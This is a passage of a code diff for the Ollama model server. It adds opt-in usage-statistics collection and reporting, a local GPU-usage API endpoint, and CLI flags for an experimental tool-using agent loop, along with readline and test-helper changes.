uip

api: expose usage data

api/client.go

@@ -377,6 +377,15 @@ func (c *Client) ListRunning(ctx context.Context) (*ProcessResponse, error) {
 	return &lr, nil
 }
 
+// Usage returns usage statistics and system info.
+func (c *Client) Usage(ctx context.Context) (*UsageResponse, error) {
+	var ur UsageResponse
+	if err := c.do(ctx, http.MethodGet, "/api/usage", nil, &ur); err != nil {
+		return nil, err
+	}
+	return &ur, nil
+}
+
 // Copy copies a model - creating a model with another name from an existing
 // model.
 func (c *Client) Copy(ctx context.Context, req *CopyRequest) error {

api/types.go

@@ -792,6 +792,33 @@ type ProcessResponse struct {
 	Models []ProcessModelResponse `json:"models"`
 }
 
+// UsageResponse is the response from [Client.Usage].
+type UsageResponse struct {
+	GPUs []GPUUsage `json:"gpus,omitempty"`
+}
+
+// GPUUsage contains GPU/device memory usage breakdown.
+type GPUUsage struct {
+	Name    string `json:"name"`    // Device name (e.g., "Apple M2 Max", "NVIDIA GeForce RTX 4090")
+	Backend string `json:"backend"` // CUDA, ROCm, Metal, etc.
+	Total   uint64 `json:"total"`
+	Free    uint64 `json:"free"`
+	Used    uint64 `json:"used"`  // Memory used by Ollama
+	Other   uint64 `json:"other"` // Memory used by other processes
+}
+
+// UsageStats contains usage statistics.
+type UsageStats struct {
+	Requests         int64            `json:"requests"`
+	TokensInput      int64            `json:"tokens_input"`
+	TokensOutput     int64            `json:"tokens_output"`
+	TotalTokens      int64            `json:"total_tokens"`
+	Models           map[string]int64 `json:"models,omitempty"`
+	Sources          map[string]int64 `json:"sources,omitempty"`
+	ToolCalls        int64            `json:"tool_calls,omitempty"`
+	StructuredOutput int64            `json:"structured_output,omitempty"`
+}
+
 // ListModelResponse is a single model description in [ListResponse].
 type ListModelResponse struct {
 	Name        string       `json:"name"`

cmd/cmd.go

@@ -45,6 +45,7 @@ import (
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/types/syncmap"
 	"github.com/ollama/ollama/version"
+	xcmd "github.com/ollama/ollama/x/cmd"
 )
 
 const ConnectInstructions = "To sign in, navigate to:\n    %s\n\n"
@@ -517,6 +518,10 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 		return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
 	}
 
+	// Check for experimental flag
+	isExperimental, _ := cmd.Flags().GetBool("experimental")
+	yoloMode, _ := cmd.Flags().GetBool("yolo")
+
 	if interactive {
 		if err := loadOrUnloadModel(cmd, &opts); err != nil {
 			var sErr api.AuthorizationError
@@ -543,6 +548,11 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 			}
 		}
 
+		// Use experimental agent loop with tools
+		if isExperimental {
+			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode)
+		}
+
 		return generateInteractive(cmd, opts)
 	}
 	return generate(cmd, opts)
@@ -1754,6 +1764,8 @@ func NewCLI() *cobra.Command {
 	runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
 	runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
 	runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
+	runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
+	runCmd.Flags().BoolP("yolo", "y", false, "Skip all tool approval prompts (use with caution)")
 
 	stopCmd := &cobra.Command{
 		Use:     "stop MODEL",
@@ -1821,6 +1833,7 @@ func NewCLI() *cobra.Command {
 		PreRunE: checkServerHeartbeat,
 		RunE:    ListRunningHandler,
 	}
+
 	copyCmd := &cobra.Command{
 		Use:     "cp SOURCE DESTINATION",
 		Short:   "Copy a model",

cmd/interactive.go

@@ -40,6 +40,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
 		fmt.Fprintln(os.Stderr, "  /bye            Exit")
 		fmt.Fprintln(os.Stderr, "  /?, /help       Help for a command")
 		fmt.Fprintln(os.Stderr, "  /? shortcuts    Help for keyboard shortcuts")
+
 		fmt.Fprintln(os.Stderr, "")
 		fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
 

envconfig/config.go

@@ -206,6 +206,8 @@ var (
 	UseAuth = Bool("OLLAMA_AUTH")
 	// Enable Vulkan backend
 	EnableVulkan = Bool("OLLAMA_VULKAN")
+	// Usage enables usage statistics reporting
+	Usage = Bool("OLLAMA_USAGE")
 )
 
 func String(s string) func() string {

model/renderers/olmo3_test.go

@@ -227,9 +227,9 @@ func TestOlmo3Renderer(t *testing.T) {
 							ID: "call_1",
 							Function: api.ToolCallFunction{
 								Name: "book_flight",
-								Arguments: testArgs(map[string]any{
-									"from": "SFO",
-									"to":   "NYC",
+								Arguments: testArgsOrdered([]orderedArg{
+									{"from", "SFO"},
+									{"to", "NYC"},
 								}),
 							},
 						},
@@ -243,9 +243,9 @@ func TestOlmo3Renderer(t *testing.T) {
 						Name: "book_flight",
 						Parameters: api.ToolFunctionParameters{
 							Type: "object",
-							Properties: testPropsMap(map[string]api.ToolProperty{
-								"from": {Type: api.PropertyType{"string"}},
-								"to":   {Type: api.PropertyType{"string"}},
+							Properties: testPropsOrdered([]orderedProp{
+								{"from", api.ToolProperty{Type: api.PropertyType{"string"}}},
+								{"to", api.ToolProperty{Type: api.PropertyType{"string"}}},
 							}),
 						},
 					},

model/renderers/testhelpers_test.go

@@ -34,3 +34,18 @@ func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments {
 	}
 	return args
 }
+
+// orderedProp represents a key-value pair for ordered property creation
+type orderedProp struct {
+	Key   string
+	Value api.ToolProperty
+}
+
+// testPropsOrdered creates a ToolPropertiesMap with a specific key order
+func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap {
+	props := api.NewToolPropertiesMap()
+	for _, p := range pairs {
+		props.Set(p.Key, p.Value)
+	}
+	return props
+}

readline/errors.go

@@ -6,6 +6,9 @@ import (
 
 var ErrInterrupt = errors.New("Interrupt")
 
+// ErrExpandOutput is returned when user presses Ctrl+O to expand tool output
+var ErrExpandOutput = errors.New("ExpandOutput")
+
 type InterruptError struct {
 	Line []rune
 }

readline/readline.go

@@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
 }
 
 type Terminal struct {
-	outchan chan rune
+	reader  *bufio.Reader
 	rawmode bool
 	termios any
 }
@@ -206,6 +206,9 @@ func (i *Instance) Readline() (string, error) {
 			buf.DeleteBefore()
 		case CharCtrlL:
 			buf.ClearScreen()
+		case CharCtrlO:
+			// Ctrl+O - expand tool output
+			return "", ErrExpandOutput
 		case CharCtrlW:
 			buf.DeleteWord()
 		case CharCtrlZ:
@@ -264,36 +267,21 @@ func NewTerminal() (*Terminal, error) {
 	if err != nil {
 		return nil, err
 	}
-
-	t := &Terminal{
-		outchan: make(chan rune),
-		rawmode: true,
-		termios: termios,
+	if err := UnsetRawMode(fd, termios); err != nil {
+		return nil, err
 	}
 
-	go t.ioloop()
+	t := &Terminal{
+		reader: bufio.NewReader(os.Stdin),
+	}
 
 	return t, nil
 }
 
-func (t *Terminal) ioloop() {
-	buf := bufio.NewReader(os.Stdin)
-
-	for {
-		r, _, err := buf.ReadRune()
-		if err != nil {
-			close(t.outchan)
-			break
-		}
-		t.outchan <- r
-	}
-}
-
 func (t *Terminal) Read() (rune, error) {
-	r, ok := <-t.outchan
-	if !ok {
-		return 0, io.EOF
+	r, _, err := t.reader.ReadRune()
+	if err != nil {
+		return 0, err
 	}
-
 	return r, nil
 }

readline/types.go

@@ -18,6 +18,7 @@ const (
 	CharCtrlL     = 12
 	CharEnter     = 13
 	CharNext      = 14
+	CharCtrlO     = 15 // Ctrl+O - used for expanding tool output
 	CharPrev      = 16
 	CharBckSearch = 18
 	CharFwdSearch = 19

server/routes.go

@@ -20,6 +20,7 @@ import (
 	"net/url"
 	"os"
 	"os/signal"
+	"runtime"
 	"slices"
 	"strings"
 	"sync/atomic"
@@ -44,6 +45,7 @@ import (
 	"github.com/ollama/ollama/model/renderers"
 	"github.com/ollama/ollama/server/internal/client/ollama"
 	"github.com/ollama/ollama/server/internal/registry"
+	"github.com/ollama/ollama/server/usage"
 	"github.com/ollama/ollama/template"
 	"github.com/ollama/ollama/thinking"
 	"github.com/ollama/ollama/tools"
@@ -82,6 +84,7 @@ type Server struct {
 	addr    net.Addr
 	sched   *Scheduler
 	lowVRAM bool
+	stats *usage.Stats
 }
 
 func init() {
@@ -104,6 +107,30 @@ var (
 	errBadTemplate = errors.New("template error")
 )
 
+// usage records a request to usage stats if enabled.
+func (s *Server) usage(c *gin.Context, endpoint, model, architecture string, promptTokens, completionTokens int, usedTools bool) {
+	if s.stats == nil {
+		return
+	}
+	s.stats.Record(&usage.Request{
+		Endpoint:         endpoint,
+		Model:            model,
+		Architecture:     architecture,
+		APIType:          usage.ClassifyAPIType(c.Request.URL.Path),
+		PromptTokens:     promptTokens,
+		CompletionTokens: completionTokens,
+		UsedTools:        usedTools,
+	})
+}
+
+// usageError records a failed request to usage stats if enabled.
+func (s *Server) usageError() {
+	if s.stats == nil {
+		return
+	}
+	s.stats.RecordError()
+}
+
 func modelOptions(model *Model, requestOpts map[string]any) (api.Options, error) {
 	opts := api.DefaultOptions()
 	if err := opts.FromMap(model.Options); err != nil {
@@ -374,7 +401,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 		c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support generate", req.Model)})
 		return
 	} else if err != nil {
-		handleScheduleError(c, req.Model, err)
+		s.handleScheduleError(c, req.Model, err)
 		return
 	}
 
@@ -561,6 +588,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 				res.DoneReason = cr.DoneReason.String()
 				res.TotalDuration = time.Since(checkpointStart)
 				res.LoadDuration = checkpointLoaded.Sub(checkpointStart)
+				s.usage(c, "generate", m.ShortName, m.Config.ModelFamily, cr.PromptEvalCount, cr.EvalCount, false)
 
 				if !req.Raw {
 					tokens, err := r.Tokenize(c.Request.Context(), prompt+sb.String())
@@ -680,7 +708,7 @@ func (s *Server) EmbedHandler(c *gin.Context) {
 
 	r, m, opts, err := s.scheduleRunner(c.Request.Context(), name.String(), []model.Capability{}, req.Options, req.KeepAlive)
 	if err != nil {
-		handleScheduleError(c, req.Model, err)
+		s.handleScheduleError(c, req.Model, err)
 		return
 	}
 
@@ -790,6 +818,7 @@ func (s *Server) EmbedHandler(c *gin.Context) {
 		LoadDuration:    checkpointLoaded.Sub(checkpointStart),
 		PromptEvalCount: int(totalTokens),
 	}
+	s.usage(c, "embed", m.ShortName, m.Config.ModelFamily, int(totalTokens), 0, false)
 	c.JSON(http.StatusOK, resp)
 }
 
@@ -827,7 +856,7 @@ func (s *Server) EmbeddingsHandler(c *gin.Context) {
 
 	r, _, _, err := s.scheduleRunner(c.Request.Context(), name.String(), []model.Capability{}, req.Options, req.KeepAlive)
 	if err != nil {
-		handleScheduleError(c, req.Model, err)
+		s.handleScheduleError(c, req.Model, err)
 		return
 	}
 
@@ -1531,6 +1560,7 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
 
 	// Inference
 	r.GET("/api/ps", s.PsHandler)
+	r.GET("/api/usage", s.UsageHandler)
 	r.POST("/api/generate", s.GenerateHandler)
 	r.POST("/api/chat", s.ChatHandler)
 	r.POST("/api/embed", s.EmbedHandler)
@@ -1593,6 +1623,13 @@ func Serve(ln net.Listener) error {
 
 	s := &Server{addr: ln.Addr()}
 
+	// Initialize usage stats if enabled
+	if envconfig.Usage() {
+		s.stats = usage.New()
+		s.stats.Start()
+		slog.Info("usage stats enabled")
+	}
+
 	var rc *ollama.Registry
 	if useClient2 {
 		var err error
@@ -1632,6 +1669,9 @@ func Serve(ln net.Listener) error {
 	signal.Notify(signals, syscall.SIGINT, syscall.SIGTERM)
 	go func() {
 		<-signals
+		if s.stats != nil {
+			s.stats.Stop()
+		}
 		srvr.Close()
 		schedDone()
 		sched.unloadAllRunners()
@@ -1649,6 +1689,24 @@ func Serve(ln net.Listener) error {
 	gpus := discover.GPUDevices(ctx, nil)
 	discover.LogDetails(gpus)
 
+	// Set GPU info for usage reporting
+	if s.stats != nil {
+		usage.GPUInfoFunc = func() []usage.GPU {
+			var result []usage.GPU
+			for _, gpu := range gpus {
+				result = append(result, usage.GPU{
+					Name:         gpu.Name,
+					VRAMBytes:    gpu.TotalMemory,
+					ComputeMajor: gpu.ComputeMajor,
+					ComputeMinor: gpu.ComputeMinor,
+					DriverMajor:  gpu.DriverMajor,
+					DriverMinor:  gpu.DriverMinor,
+				})
+			}
+			return result
+		}
+	}
+
 	var totalVRAM uint64
 	for _, gpu := range gpus {
 		totalVRAM += gpu.TotalMemory - envconfig.GpuOverhead()
@@ -1852,6 +1910,63 @@ func (s *Server) PsHandler(c *gin.Context) {
 	c.JSON(http.StatusOK, api.ProcessResponse{Models: models})
 }
 
+func (s *Server) UsageHandler(c *gin.Context) {
+	// Get total VRAM used by Ollama
+	s.sched.loadedMu.Lock()
+	var totalOllamaVRAM uint64
+	for _, runner := range s.sched.loaded {
+		totalOllamaVRAM += runner.vramSize
+	}
+	s.sched.loadedMu.Unlock()
+
+	var resp api.UsageResponse
+
+	// Get GPU/device info
+	gpus := discover.GPUDevices(c.Request.Context(), nil)
+
+	// On Apple Silicon, use system memory instead of Metal's recommendedMaxWorkingSetSize
+	// because unified memory means GPU and CPU share the same physical RAM pool
+	var sysTotal, sysFree uint64
+	if runtime.GOOS == "darwin" && runtime.GOARCH == "arm64" {
+		sysInfo := discover.GetSystemInfo()
+		sysTotal = sysInfo.TotalMemory
+		sysFree = sysInfo.FreeMemory
+	}
+
+	for _, gpu := range gpus {
+		total := gpu.TotalMemory
+		free := gpu.FreeMemory
+
+		// On Apple Silicon, override with system memory values
+		if runtime.GOOS == "darwin" && runtime.GOARCH == "arm64" && sysTotal > 0 {
+			total = sysTotal
+			free = sysFree
+		}
+
+		used := total - free
+		ollamaUsed := min(totalOllamaVRAM, used)
+		otherUsed := used - ollamaUsed
+
+		// Use Description for Name (actual device name like "Apple M2 Max")
+		// Fall back to backend name if Description is empty
+		name := gpu.Description
+		if name == "" {
+			name = gpu.Name
+		}
+
+		resp.GPUs = append(resp.GPUs, api.GPUUsage{
+			Name:    name,
+			Backend: gpu.Library,
+			Total:   total,
+			Free:    free,
+			Used:    ollamaUsed,
+			Other:   otherUsed,
+		})
+	}
+
+	c.JSON(http.StatusOK, resp)
+}
+
 func toolCallId() string {
 	const letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789"
 	b := make([]byte, 8)
@@ -2032,7 +2147,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
 		c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support chat", req.Model)})
 		return
 	} else if err != nil {
-		handleScheduleError(c, req.Model, err)
+		s.handleScheduleError(c, req.Model, err)
 		return
 	}
 
@@ -2180,6 +2295,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
 					res.DoneReason = r.DoneReason.String()
 					res.TotalDuration = time.Since(checkpointStart)
 					res.LoadDuration = checkpointLoaded.Sub(checkpointStart)
+					s.usage(c, "chat", m.ShortName, m.Config.ModelFamily, r.PromptEvalCount, r.EvalCount, len(req.Tools) > 0)
 				}
 
 				if builtinParser != nil {
@@ -2355,6 +2471,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
 			resp.Message.ToolCalls = toolCalls
 		}
 
+		s.usage(c, "chat", m.ShortName, m.Config.ModelFamily, resp.PromptEvalCount, resp.EvalCount, len(toolCalls) > 0)
 		c.JSON(http.StatusOK, resp)
 		return
 	}
@@ -2362,7 +2479,8 @@ func (s *Server) ChatHandler(c *gin.Context) {
 	streamResponse(c, ch)
 }
 
-func handleScheduleError(c *gin.Context, name string, err error) {
+func (s *Server) handleScheduleError(c *gin.Context, name string, err error) {
+	s.usageError()
 	switch {
 	case errors.Is(err, errCapabilities), errors.Is(err, errRequired):
 		c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})

server/routes_usage_test.go

@@ -0,0 +1,60 @@
+package server
+
+import (
+	"encoding/json"
+	"net/http"
+	"testing"
+
+	"github.com/gin-gonic/gin"
+
+	"github.com/ollama/ollama/api"
+)
+
+func TestUsageHandler(t *testing.T) {
+	gin.SetMode(gin.TestMode)
+
+	t.Run("empty server", func(t *testing.T) {
+		s := Server{
+			sched: &Scheduler{
+				loaded: make(map[string]*runnerRef),
+			},
+		}
+
+		w := createRequest(t, s.UsageHandler, nil)
+		if w.Code != http.StatusOK {
+			t.Fatalf("expected status code 200, actual %d", w.Code)
+		}
+
+		var resp api.UsageResponse
+		if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+			t.Fatal(err)
+		}
+
+		// GPUs may or may not be present depending on system
+		// Just verify we can decode the response
+	})
+
+	t.Run("response structure", func(t *testing.T) {
+		s := Server{
+			sched: &Scheduler{
+				loaded: make(map[string]*runnerRef),
+			},
+		}
+
+		w := createRequest(t, s.UsageHandler, nil)
+		if w.Code != http.StatusOK {
+			t.Fatalf("expected status code 200, actual %d", w.Code)
+		}
+
+		// Verify we can decode the response as valid JSON
+		var resp map[string]any
+		if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+			t.Fatal(err)
+		}
+
+		// The response should be a valid object (not null)
+		if resp == nil {
+			t.Error("expected non-nil response")
+		}
+	})
+}

server/usage/reporter.go

@@ -0,0 +1,65 @@
+package usage
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"time"
+
+	"github.com/ollama/ollama/version"
+)
+
+const (
+	reportTimeout = 10 * time.Second
+	usageURL      = "https://ollama.com/api/usage"
+)
+
+// HeartbeatResponse is the response from the heartbeat endpoint.
+type HeartbeatResponse struct {
+	UpdateVersion string `json:"update_version,omitempty"`
+}
+
+// UpdateAvailable returns the available update version, if any.
+func (t *Stats) UpdateAvailable() string {
+	if v := t.updateAvailable.Load(); v != nil {
+		return v.(string)
+	}
+	return ""
+}
+
+// sendHeartbeat sends usage stats and checks for updates.
+func (t *Stats) sendHeartbeat(payload *Payload) {
+	data, err := json.Marshal(payload)
+	if err != nil {
+		return
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), reportTimeout)
+	defer cancel()
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, usageURL, bytes.NewReader(data))
+	if err != nil {
+		return
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("User-Agent", fmt.Sprintf("ollama/%s", version.Version))
+
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		return
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		return
+	}
+
+	var heartbeat HeartbeatResponse
+	if err := json.NewDecoder(resp.Body).Decode(&heartbeat); err != nil {
+		return
+	}
+
+	t.updateAvailable.Store(heartbeat.UpdateVersion)
+}

server/usage/source.go

@@ -0,0 +1,23 @@
+package usage
+
+import (
+	"strings"
+)
+
+// API type constants
+const (
+	APITypeOllama    = "ollama"
+	APITypeOpenAI    = "openai"
+	APITypeAnthropic = "anthropic"
+)
+
+// ClassifyAPIType determines the API type from the request path.
+func ClassifyAPIType(path string) string {
+	if strings.HasPrefix(path, "/v1/messages") {
+		return APITypeAnthropic
+	}
+	if strings.HasPrefix(path, "/v1/") {
+		return APITypeOpenAI
+	}
+	return APITypeOllama
+}

server/usage/usage.go

@@ -0,0 +1,324 @@
+// Package usage provides in-memory usage statistics collection and reporting.
+package usage
+
+import (
+	"runtime"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/ollama/ollama/discover"
+	"github.com/ollama/ollama/version"
+)
+
+// Stats collects usage statistics in memory and reports them periodically.
+type Stats struct {
+	mu sync.RWMutex
+
+	// Atomic counters for hot path
+	requestsTotal    atomic.Int64
+	tokensPrompt     atomic.Int64
+	tokensCompletion atomic.Int64
+	errorsTotal      atomic.Int64
+
+	// Map-based counters (require lock)
+	endpoints     map[string]int64
+	architectures map[string]int64
+	apis          map[string]int64
+	models        map[string]*ModelStats // per-model stats
+
+	// Feature usage
+	toolCalls        atomic.Int64
+	structuredOutput atomic.Int64
+
+	// Update info (set by reporter after pinging update endpoint)
+	updateAvailable atomic.Value // string
+
+	// Reporter
+	stopCh   chan struct{}
+	doneCh   chan struct{}
+	interval time.Duration
+	endpoint string
+}
+
+// ModelStats tracks per-model usage statistics.
+type ModelStats struct {
+	Requests     int64
+	TokensInput  int64
+	TokensOutput int64
+}
+
+// Request contains the data to record for a single request.
+type Request struct {
+	Endpoint         string // "chat", "generate", "embed"
+	Model            string // model name (e.g., "llama3.2:3b")
+	Architecture     string // model architecture (e.g., "llama", "qwen2")
+	APIType          string // "native" or "openai_compat"
+	PromptTokens     int
+	CompletionTokens int
+	UsedTools        bool
+	StructuredOutput bool
+}
+
+// SystemInfo contains hardware information to report.
+type SystemInfo struct {
+	OS        string `json:"os"`
+	Arch      string `json:"arch"`
+	CPUCores  int    `json:"cpu_cores"`
+	RAMBytes  uint64 `json:"ram_bytes"`
+	GPUs      []GPU  `json:"gpus,omitempty"`
+}
+
+// GPU contains information about a GPU.
+type GPU struct {
+	Name         string `json:"name"`
+	VRAMBytes    uint64 `json:"vram_bytes"`
+	ComputeMajor int    `json:"compute_major,omitempty"`
+	ComputeMinor int    `json:"compute_minor,omitempty"`
+	DriverMajor  int    `json:"driver_major,omitempty"`
+	DriverMinor  int    `json:"driver_minor,omitempty"`
+}
+
+// Payload is the data sent to the heartbeat endpoint.
+type Payload struct {
+	Version string     `json:"version"`
+	Time    time.Time  `json:"time"`
+	System  SystemInfo `json:"system"`
+
+	Totals struct {
+		Requests     int64 `json:"requests"`
+		Errors       int64 `json:"errors"`
+		InputTokens  int64 `json:"input_tokens"`
+		OutputTokens int64 `json:"output_tokens"`
+	} `json:"totals"`
+
+	Endpoints     map[string]int64 `json:"endpoints"`
+	Architectures map[string]int64 `json:"architectures"`
+	APIs          map[string]int64 `json:"apis"`
+
+	Features struct {
+		ToolCalls        int64 `json:"tool_calls"`
+		StructuredOutput int64 `json:"structured_output"`
+	} `json:"features"`
+}
+
+const (
+	defaultInterval = 1 * time.Hour
+)
+
+// New creates a new Stats instance.
+func New(opts ...Option) *Stats {
+	t := &Stats{
+		endpoints:     make(map[string]int64),
+		architectures: make(map[string]int64),
+		apis:          make(map[string]int64),
+		models:        make(map[string]*ModelStats),
+		stopCh:        make(chan struct{}),
+		doneCh:        make(chan struct{}),
+		interval:      defaultInterval,
+	}
+
+	for _, opt := range opts {
+		opt(t)
+	}
+
+	return t
+}
+
+// Option configures the Stats instance.
+type Option func(*Stats)
+
+// WithInterval sets the reporting interval.
+func WithInterval(d time.Duration) Option {
+	return func(t *Stats) {
+		t.interval = d
+	}
+}
+
+// Record records a request. This is the hot path and should be fast.
+func (t *Stats) Record(r *Request) {
+	t.requestsTotal.Add(1)
+	t.tokensPrompt.Add(int64(r.PromptTokens))
+	t.tokensCompletion.Add(int64(r.CompletionTokens))
+
+	if r.UsedTools {
+		t.toolCalls.Add(1)
+	}
+	if r.StructuredOutput {
+		t.structuredOutput.Add(1)
+	}
+
+	t.mu.Lock()
+	t.endpoints[r.Endpoint]++
+	t.architectures[r.Architecture]++
+	t.apis[r.APIType]++
+
+	// Track per-model stats
+	if r.Model != "" {
+		if t.models[r.Model] == nil {
+			t.models[r.Model] = &ModelStats{}
+		}
+		t.models[r.Model].Requests++
+		t.models[r.Model].TokensInput += int64(r.PromptTokens)
+		t.models[r.Model].TokensOutput += int64(r.CompletionTokens)
+	}
+	t.mu.Unlock()
+}
+
+// RecordError records a failed request.
+func (t *Stats) RecordError() {
+	t.errorsTotal.Add(1)
+}
+
+// GetModelStats returns a copy of per-model statistics.
+func (t *Stats) GetModelStats() map[string]*ModelStats {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+
+	result := make(map[string]*ModelStats, len(t.models))
+	for k, v := range t.models {
+		result[k] = &ModelStats{
+			Requests:     v.Requests,
+			TokensInput:  v.TokensInput,
+			TokensOutput: v.TokensOutput,
+		}
+	}
+	return result
+}
+
+// View returns current stats without resetting counters.
+func (t *Stats) View() *Payload {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+
+	now := time.Now()
+
+	// Copy maps
+	endpoints := make(map[string]int64, len(t.endpoints))
+	for k, v := range t.endpoints {
+		endpoints[k] = v
+	}
+	architectures := make(map[string]int64, len(t.architectures))
+	for k, v := range t.architectures {
+		architectures[k] = v
+	}
+	apis := make(map[string]int64, len(t.apis))
+	for k, v := range t.apis {
+		apis[k] = v
+	}
+
+	p := &Payload{
+		Version:       version.Version,
+		Time:          now,
+		System:        getSystemInfo(),
+		Endpoints:     endpoints,
+		Architectures: architectures,
+		APIs:          apis,
+	}
+
+	p.Totals.Requests = t.requestsTotal.Load()
+	p.Totals.Errors = t.errorsTotal.Load()
+	p.Totals.InputTokens = t.tokensPrompt.Load()
+	p.Totals.OutputTokens = t.tokensCompletion.Load()
+	p.Features.ToolCalls = t.toolCalls.Load()
+	p.Features.StructuredOutput = t.structuredOutput.Load()
+
+	return p
+}
+
+// Snapshot returns current stats and resets counters.
+func (t *Stats) Snapshot() *Payload {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+
+	now := time.Now()
+	p := &Payload{
+		Version:       version.Version,
+		Time:          now,
+		System:        getSystemInfo(),
+		Endpoints:     t.endpoints,
+		Architectures: t.architectures,
+		APIs:          t.apis,
+	}
+
+	p.Totals.Requests = t.requestsTotal.Swap(0)
+	p.Totals.Errors = t.errorsTotal.Swap(0)
+	p.Totals.InputTokens = t.tokensPrompt.Swap(0)
+	p.Totals.OutputTokens = t.tokensCompletion.Swap(0)
+	p.Features.ToolCalls = t.toolCalls.Swap(0)
+	p.Features.StructuredOutput = t.structuredOutput.Swap(0)
+
+	// Reset maps
+	t.endpoints = make(map[string]int64)
+	t.architectures = make(map[string]int64)
+	t.apis = make(map[string]int64)
+
+	return p
+}
+
+// getSystemInfo collects hardware information.
+func getSystemInfo() SystemInfo {
+	info := SystemInfo{
+		OS:   runtime.GOOS,
+		Arch: runtime.GOARCH,
+	}
+
+	// Get CPU and memory info
+	sysInfo := discover.GetSystemInfo()
+	info.CPUCores = sysInfo.ThreadCount
+	info.RAMBytes = sysInfo.TotalMemory
+
+	// Get GPU info
+	gpus := getGPUInfo()
+	info.GPUs = gpus
+
+	return info
+}
+
+// GPUInfoFunc is a function that returns GPU information.
+// It's set by the server package after GPU discovery.
+var GPUInfoFunc func() []GPU
+
+// getGPUInfo collects GPU information.
+func getGPUInfo() []GPU {
+	if GPUInfoFunc != nil {
+		return GPUInfoFunc()
+	}
+	return nil
+}
+
+// Start begins the periodic reporting goroutine.
+func (t *Stats) Start() {
+	go t.reportLoop()
+}
+
+// Stop stops reporting and waits for the final report.
+func (t *Stats) Stop() {
+	close(t.stopCh)
+	<-t.doneCh
+}
+
+// reportLoop runs the periodic reporting.
+func (t *Stats) reportLoop() {
+	defer close(t.doneCh)
+
+	ticker := time.NewTicker(t.interval)
+	defer ticker.Stop()
+
+	for {
+		select {
+		case <-ticker.C:
+			t.report()
+		case <-t.stopCh:
+			// Send final report before stopping
+			t.report()
+			return
+		}
+	}
+}
+
+// report sends usage stats and checks for updates.
+func (t *Stats) report() {
+	payload := t.Snapshot()
+	t.sendHeartbeat(payload)
+}

server/usage/usage_test.go

@@ -0,0 +1,194 @@
+package usage
+
+import (
+	"testing"
+)
+
+func TestNew(t *testing.T) {
+	stats := New()
+	if stats == nil {
+		t.Fatal("New() returned nil")
+	}
+}
+
+func TestRecord(t *testing.T) {
+	stats := New()
+
+	stats.Record(&Request{
+		Model:            "llama3:8b",
+		Endpoint:         "chat",
+		Architecture:     "llama",
+		APIType:          "native",
+		PromptTokens:     100,
+		CompletionTokens: 50,
+		UsedTools:        true,
+		StructuredOutput: false,
+	})
+
+	// Check totals
+	payload := stats.View()
+	if payload.Totals.Requests != 1 {
+		t.Errorf("expected 1 request, got %d", payload.Totals.Requests)
+	}
+	if payload.Totals.InputTokens != 100 {
+		t.Errorf("expected 100 prompt tokens, got %d", payload.Totals.InputTokens)
+	}
+	if payload.Totals.OutputTokens != 50 {
+		t.Errorf("expected 50 completion tokens, got %d", payload.Totals.OutputTokens)
+	}
+	if payload.Features.ToolCalls != 1 {
+		t.Errorf("expected 1 tool call, got %d", payload.Features.ToolCalls)
+	}
+	if payload.Features.StructuredOutput != 0 {
+		t.Errorf("expected 0 structured outputs, got %d", payload.Features.StructuredOutput)
+	}
+}
+
+func TestGetModelStats(t *testing.T) {
+	stats := New()
+
+	// Record requests for multiple models
+	stats.Record(&Request{
+		Model:            "llama3:8b",
+		PromptTokens:     100,
+		CompletionTokens: 50,
+	})
+	stats.Record(&Request{
+		Model:            "llama3:8b",
+		PromptTokens:     200,
+		CompletionTokens: 100,
+	})
+	stats.Record(&Request{
+		Model:            "mistral:7b",
+		PromptTokens:     50,
+		CompletionTokens: 25,
+	})
+
+	modelStats := stats.GetModelStats()
+
+	// Check llama3:8b stats
+	llama := modelStats["llama3:8b"]
+	if llama == nil {
+		t.Fatal("expected llama3:8b stats")
+	}
+	if llama.Requests != 2 {
+		t.Errorf("expected 2 requests for llama3:8b, got %d", llama.Requests)
+	}
+	if llama.TokensInput != 300 {
+		t.Errorf("expected 300 input tokens for llama3:8b, got %d", llama.TokensInput)
+	}
+	if llama.TokensOutput != 150 {
+		t.Errorf("expected 150 output tokens for llama3:8b, got %d", llama.TokensOutput)
+	}
+
+	// Check mistral:7b stats
+	mistral := modelStats["mistral:7b"]
+	if mistral == nil {
+		t.Fatal("expected mistral:7b stats")
+	}
+	if mistral.Requests != 1 {
